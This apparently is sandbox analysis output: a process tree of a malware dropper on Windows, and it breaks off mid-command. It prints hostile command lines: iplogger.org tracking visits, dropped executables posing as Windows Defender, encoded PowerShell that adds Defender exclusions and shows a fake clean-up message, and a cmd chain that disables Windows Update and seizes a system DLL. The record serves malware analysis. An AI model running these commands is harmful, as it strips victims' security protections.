C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,16592053720459048573,16019932122781940056,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,16592053720459048573,16019932122781940056,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1nfDK42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,143610837064834116,16583740783386230664,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,143610837064834116,16583740783386230664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AbtZ42⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xb4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7688 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7704 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8100 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6840 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff694bd5460,0x7ff694bd5470,0x7ff694bd54804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6840 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3176 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1n6sL42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,8979061879212629283,807440930091685079,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,8979061879212629283,807440930091685079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RqtB42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,13084215389252216617,11879332690124497779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1956 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,13084215389252216617,11879332690124497779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\real.exe"C:\Program Files (x86)\Company\NewProduct\real.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Company\NewProduct\safert44.exe"C:\Program Files (x86)\Company\NewProduct\safert44.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exe"C:\Program Files (x86)\Company\NewProduct\F0geI.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6448 -s 7603⤵
- Program crash
-
C:\Program Files (x86)\Company\NewProduct\tag.exe"C:\Program Files (x86)\Company\NewProduct\tag.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exe"C:\Program Files (x86)\Company\NewProduct\jshainx.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe"C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZgB0ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAYwBhACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAQQBsAGwAIAB2AGkAcgB1AHMAZQBzACAAaABhAHMAIABiAGUAZQBuACAAZABlAGwAZQB0AGUAZAAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdgBkAGUAIwA+AA=="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AbAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcQBoACMAPgA="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Windows Defender.exe"C:\Users\Admin\Windows Defender.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Windows Defender.exe"5⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZQB2AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAaQB1AHUAIwA+AA=="6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand 